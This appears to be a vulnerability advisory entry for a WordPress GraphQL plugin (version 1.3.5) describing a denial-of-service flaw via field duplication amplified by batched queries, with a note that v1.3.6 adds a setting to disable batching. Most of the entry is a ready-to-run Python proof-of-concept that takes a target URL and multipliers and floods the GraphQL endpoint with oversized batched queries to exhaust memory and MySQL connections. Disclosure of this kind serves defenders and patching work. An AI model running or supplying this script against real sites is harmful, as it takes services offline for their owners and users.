The plugin suffers from a Denial of Service vulnerability by Field Duplication. It is possible to create an expensive query by duplicating the number of fields, while simultaneously sending these requests in batches using GraphQL's Batching capability. v1.3.6 added a setting to disable batch queries
""" This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors. """ import sys import requests def usage(): print('* WordPress GraphQL 1.3.5 Denial of Service *') print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0])) print('python {} http://site.com 10000 100'.format(sys.argv[0])) sys.exit(1) if len(sys.argv) < 4: print('Missing arguments!') usage() def wpgql_exists(): try: r = requests.post(WORDPRESS_URL, json='x') if 'GraphQL' in r.json()['errors'][0]['message']: return True except: pass return False # This PoC assumes graphql is located at index.php?graphql WORDPRESS_URL = sys.argv[1] + '/index.php?graphql' FORCE_MULTIPLIER = int(sys.argv[2]) CHAINED_REQUESTS = int(sys.argv[3]) if wpgql_exists is False: print('Could not identify GraphQL running at "/index.php?graphql"') sys.exit(1) queries = [] payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'} for _ in range(0, CHAINED_REQUESTS): queries.append(query) r = requests.post(WORDPRESS_URL, json=queries) print('Time took: {} seconds '.format(r.elapsed.total_seconds())) print('Response:', r.json())
DOS
Dolev Farhi
Dolev Farhi
Yes
2021-04-27 (about 1 years ago)
2021-04-27 (about 1 years ago)
2021-08-10 (about 1 years ago)